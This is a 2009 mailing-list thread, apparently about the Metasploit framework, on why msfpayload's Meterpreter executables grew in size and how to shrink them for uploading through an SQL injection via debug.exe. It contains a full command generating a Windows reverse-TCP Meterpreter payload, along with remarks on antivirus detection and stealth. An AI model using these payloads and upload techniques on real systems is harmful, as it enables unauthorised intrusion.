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Re: Msfpayload output size significantly bigger in v3.3 vs. v3.2

From: Raul Siles <raul.siles () gmail com>
Date: Thu, 17 Dec 2009 01:19:30 +0100

Thanks Joshua & HD for the clarifications!

Joshua, I tried it using a smaller template and everything worked like
a charm in sqlninja. Of course, I've seen different behaviors based on
the EXE template used during my tests, such as cmd.exe windows that
remain opened (not very stealthy ;). Any recommendation for the
selection of the EXE template?

HD, I tried the new "-t exe-small" option but the following error is
generated (r7895):
$ msfpayload windows/meterpreter/reverse_tcp exitfunc=process
lport=443 lhost= X | msfencode -e generic/none -t exe-small
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: exitfunc=process,lport=443,lhost=
[*] generic/none succeeded with size 87552 (iteration=1)

[-] generic/none failed: The EXE generator now has a max size of 2048
bytes, please fix the calling module
[-] No encoders succeeded.

It seems it uses "template-old.exe", but if size > 2048 it generated
the error above. The old template file is 4608 bytes:

-rw-r--r-- 1 samurai samurai  4608 2009-11-06 08:26 template-old.exe

BTW, the "-t exe-small" option has not been added to the latest
msfencode help :)

I completely agree the right way to do it would be to use a two-stage
approach, like the one you described.

Raul Siles

On Sun, Dec 13, 2009 at 8:06 PM, HD Moore <hdm () metasploit com> wrote:
On 12/13/2009 6:58 AM, Raul Siles wrote:

Hi there,
I've seen that the standard (reverse or bind) Meterpreter payload size
generated by msfpayload (for Windows .exe files) is an order of
magnitud bigger in MSF v3.3.1 vs. MSF v.3.2.

MSF v3.2:    9.728 bytes
MSF v3.3.1: 87.552 bytes

Without having gone in depth into the source code, is there any option
to reduce the size of the generated payload to a smaller one (like in
the range of v3.2)?

There is now (r7840) by passing -t exe-small to msfencode, which will cause
it to use the old method. The old method is flagged by most major antivirus
products however and the new method is much more robust going forward.

The reason I'm asking this is due to constraints in the integration
between sqlninja and MSF to updload bigger payloads through the
Windows debug.exe technique (max 64K) using a SQLi vulnerability.

We avoid this in mssql_payload by uploading a small EXE first (h2b) and then
using that to decode the bigger exe uploaded as raw hex. You can probably
squeeze into a binary under 64k just by picking a smaller template, as
Joshua mentioned.



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